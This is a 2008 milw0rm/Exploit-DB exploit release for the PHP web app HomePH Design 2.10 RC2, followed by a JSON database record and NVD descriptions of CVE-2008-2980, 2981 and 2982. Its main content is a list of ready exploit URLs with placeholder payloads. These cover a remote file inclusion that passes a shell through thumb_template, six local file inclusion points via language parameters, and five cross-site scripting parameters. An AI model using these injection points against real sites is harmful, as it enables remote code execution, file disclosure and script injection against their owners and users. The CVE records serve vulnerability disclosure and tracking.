???????????????????????????????????????????????????????????????????????????????
?? C r a C k E r ??
?? T H E C R A C K O F E T E R N A L M I G H T ??
??????????????????????????????????????????????????????????????????????????????
????? From The Ashes and Dust Rises An Unimaginable crack.... ?????
??????????????????????????????????????????????????????????????????????????????
?? [ Remote File Include ] [ Local File Include ] [XSS] ??
??????????????????????????????????????????????????????????????????????????????
: Author : CraCkEr : : :
? Group : uNiTeD CraCkiNg ForCE ? ? ?
? Script : HomePH Design 2.10 RC2 ? ? Register Globals : ?
? Download : SourceForge.net ? ? ?
? Method : GET ? ? [?] ON [ ] OFF ?
? Critical : High [????????] ? ? ?
? Impact : System access ? ? ?
? ????????????????????????????????????? ???????????????????????????????????? ?
? DALnet #crackers ??
??????????????????????????????????????????????????????????????????????????????
: :
? Release Notes: ?
? ????????????? ?
? Typically used for remotely exploitable vulnerabilities that can lead to ?
? system compromise. ?
? ?
??????????????????????????????????????????????????????????????????????????????
?? Exploit URL's ??
??????????????????????????????????????????????????????????????????????????????
[RFI]
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]
[LFI]
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]
http://localhost/path/admin/features/account/account.php?language=[LFI]
http://localhost/path/admin/features/downloads/downloads.php?language=[LFI]
http://localhost/path/admin/features/forum/forum.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]
[XSS]
http://localhost/path/admin/features/register/register.php?error_meldung=[XSS]
http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]
http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]
http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]
http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]
Notes: More files are infected.
?????
??????????????????????????????????????????????????????????????????????????????
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
??????????????????????????????????????????????????????????????????????????????
?? Š CraCkEr 2008 ??
??????????????????????????????????????????????????????????????????????????????
# milw0rm.com [2008-06-22]
{"id": "EDB-ID:5903", "hash": "4eb30e93de9a659ba571325a44e94dc2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "HomePH Design 2.10 RC2 RFI/LFI/XSS Multiple Vulnerabilities", "description": "HomePH Design 2.10 RC2 (RFI/LFI/XSS) Multiple Vulnerabilities. CVE-2008-2980,CVE-2008-2981,CVE-2008-2982. Webapps exploit for php platform", "published": "2008-06-22T00:00:00", "modified": "2008-06-22T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5903/", "reporter": "CraCkEr", "references": [], "cvelist": ["CVE-2008-2982", "CVE-2008-2981", "CVE-2008-2980"], "lastseen": "2016-01-31T23:47:24", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2016-01-31T23:47:24"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2980", "CVE-2008-2981", "CVE-2008-2982"]}], "modified": "2016-01-31T23:47:24"}, "vulnersScore": 6.6}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5903/", "sourceData": "???????????????????????????????????????????????????????????????????????????????\r\n?? C r a C k E r ??\r\n?? T H E C R A C K O F E T E R N A L M I G H T ??\r\n??????????????????????????????????????????????????????????????????????????????\r\n\r\n ????? From The Ashes and Dust Rises An Unimaginable crack.... ?????\r\n??????????????????????????????????????????????????????????????????????????????\r\n?? [ Remote File Include ] [ Local File Include ] [XSS] ??\r\n??????????????????????????????????????????????????????????????????????????????\r\n: Author : CraCkEr : : :\r\n? Group : uNiTeD CraCkiNg ForCE ? ? ?\r\n? Script : HomePH Design 2.10 RC2 ? ? Register Globals : ?\r\n? Download : SourceForge.net ? ? ?\r\n? Method : GET ? ? [?] ON [ ] OFF ?\r\n? Critical : High [????????] ? ? ?\r\n? Impact : System access ? ? ?\r\n? ????????????????????????????????????? ???????????????????????????????????? ?\r\n? DALnet #crackers ??\r\n??????????????????????????????????????????????????????????????????????????????\r\n: :\r\n? Release Notes: ?\r\n? ????????????? ?\r\n? Typically used for remotely exploitable vulnerabilities that can lead to ?\r\n? system compromise. ?\r\n? ?\r\n\r\n??????????????????????????????????????????????????????????????????????????????\r\n?? Exploit URL's ??\r\n??????????????????????????????????????????????????????????????????????????????\r\n \r\n\r\n[RFI]\r\n\r\nhttp://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]\r\n\r\n[LFI]\r\n\r\nhttp://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]\r\nhttp://localhost/path/admin/features/account/account.php?language=[LFI]\r\nhttp://localhost/path/admin/features/downloads/downloads.php?language=[LFI]\r\nhttp://localhost/path/admin/features/forum/forum.php?language=[LFI]\r\nhttp://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]\r\nhttp://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]\r\n\r\n[XSS]\r\n\r\nhttp://localhost/path/admin/features/register/register.php?error_meldung=[XSS]\r\nhttp://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]\r\nhttp://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]\r\nhttp://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]\r\nhttp://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]\r\n\r\n Notes: More files are infected.\r\n ?????\r\n\r\n??????????????????????????????????????????????????????????????????????????????\r\n \r\nGreets:\r\n The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS\r\n\r\n??????????????????????????????????????????????????????????????????????????????\r\n?? \u00c2\u0160 CraCkEr 2008 ??\r\n??????????????????????????????????????????????????????????????????????????????\r\n\r\n# milw0rm.com [2008-06-22]", "osvdbidlist": ["46901", "46891", "46899", "46898", "46894", "46892", "46900", "46895", "46864", "46893", "46897", "46896"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:27", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in HomePH Design 2.10 RC2 allow remote attackers to inject arbitrary web script or HTML via the (1) error_meldung parameter to admin/features/register/register.php, the (2) feature_language[ueberschrift] parameter to admin/features/memberlist/memberlist.php, the (3) language_array[ueberschrift] parameter to admin/features/lostpassword/lostpassword.php, the (4) language_feature[titel] parameter to admin/features/kalender/eingabe.php, and the (5) language_feature[bildmenu] parameter to admin/features/fotogalerie/eingabe.php.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-2980", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2980", "published": "2008-07-02T17:14:00", "title": "CVE-2008-2980", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:09:27", "bulletinFamily": "NVD", "description": "PHP remote file inclusion vulnerability in admin/templates/template_thumbnail.php in HomePH Design 2.10 RC2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the thumb_template parameter.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-2981", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2981", "published": "2008-07-02T17:14:00", "title": "CVE-2008-2981", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:09:27", "bulletinFamily": "NVD", "description": "Multiple directory traversal vulnerabilities in HomePH Design 2.10 RC2, when register_globals is enabled, allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the (1) thumb_template parameter to (a) admin/templates/template_thumbnail.php, and the (2) language parameter to (b) account/account.php, (c) downloads/downloads.php, (d) forum/forum.php, (e) fotogalerie/delete.php, and (f) fotogalerie/fotogalerie.php in admin/features/.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-2982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2982", "published": "2008-07-02T17:14:00", "title": "CVE-2008-2982", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
